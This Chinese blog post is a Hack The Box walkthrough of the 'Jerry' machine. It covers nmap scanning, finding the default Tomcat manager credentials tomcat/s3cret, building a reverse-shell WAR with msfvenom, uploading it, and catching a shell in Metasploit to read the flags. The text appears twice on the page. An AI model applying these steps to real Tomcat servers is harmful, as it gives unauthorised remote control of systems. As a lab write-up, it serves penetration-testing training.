写点什么

HTB:Jerry 渗透测试

用户头像
Machine Gun
关注
发布于: 3 小时前

基础信息

简介:Hack The Box 是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好地适应在真实环境的渗透链接:https://www.hackthebox.eu/home/machines/profile/144 描述:

前言

本次演练使用 kali 系统按照渗透测试的过程进行操作,通过 nmap 发现端口开放了 tomcat8080 端口,使用密码登录 tomcat,使用 msfvenom 生成 war 文件上传到 tomcat 中,通过反弹获取 shell。

一、信息收集

1、靶机 ip

IP 地址为:10.10.10.95

2、靶机端口与服务

nmap -sV -sS -T4 -O -A 10.10.10.95 PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-server-header: Apache-Coyote/1.1 |_http-title: Apache Tomcat/7.0.88

3、网站信息收集

查看 8080 端口通过 dirsearch 进行目录扫描获取网站目录这里我列出了部分需要的目录/host-manager/html /manager/html /manager/

二、漏洞探测与利用

1、生成木马文件

进入/host-manager/html 目录发现需要账号密码点击取消后,再返回界面发现账号与密码 username="tomcat"password="s3cret"使用该密码进行登录,返回 403 页面无法正常进行登录最后在/manager/目录下成功登录发现可以上传 war 格式文件使用 msfvenom 生成 shell 文件msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war

2、使用 msf 获取 shell

首先设置好 msf,使用 msf 监听 4444 端口获取反弹的 shell 在登陆页面上传 war 文件上传成功后点击 shell 成功获取到 shell

三、提权

使用这种方式所获取的直接是 authority 权限可直接查看 root.txt 进入 \Users\Administrator\Desktop 目录发现没有 root.txt 但是存在 flags 进入 flags 目录使用 type 命令查看 2 for the price of 1.txt 文件获取到 root.txt 与 user.txt 础信息

简介:Hack The Box 是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好地适应在真实环境的渗透链接:https://www.hackthebox.eu/home/machines/profile/144描述:


前言

本次演练使用 kali 系统按照渗透测试的过程进行操作,通过 nmap 发现端口开放了 tomcat8080 端口,使用密码登录 tomcat,使用 msfvenom 生成 war 文件上传到 tomcat 中,通过反弹获取 shell。

一、信息收集

1、靶机 ip

IP 地址为:10.10.10.95


2、靶机端口与服务

nmap -sV -sS -T4 -O -A 10.10.10.95
复制代码



PORT     STATE SERVICE VERSION8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1|_http-server-header: Apache-Coyote/1.1|_http-title: Apache Tomcat/7.0.88
复制代码

3、网站信息收集

查看 8080 端口


通过 dirsearch 进行目录扫描获取网站目录


这里我列出了部分需要的目录

/host-manager/html/manager/html/manager/
复制代码

二、漏洞探测与利用

1、生成木马文件

进入/host-manager/html 目录发现需要账号密码


点击取消后,再返回界面发现账号与密码


username="tomcat"password="s3cret"使用该密码进行登录,返回 403 页面无法正常进行登录


最后在/manager/目录下成功登录


发现可以上传 war 格式文件使用 msfvenom 生成 shell 文件

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f war > shell.war
复制代码



2、使用 msf 获取 shell

首先设置好 msf,使用 msf 监听 4444 端口获取反弹的 shell


在登陆页面上传 war 文件


上传成功后点击 shell


成功获取到 shell


三、提权

使用这种方式所获取的直接是 authority 权限可直接查看 root.txt


进入 \Users\Administrator\Desktop 目录发现没有 root.txt 但是存在 flags


进入 flags 目录使用 type 命令查看 2 for the price of 1.txt 文件获取到 root.txt 与 user.txt


用户头像

Machine Gun

关注

还未添加个人签名 2021.03.28 加入

Every Time I Die

评论

发布
暂无评论
网络安全入门之owasp top10漏洞详解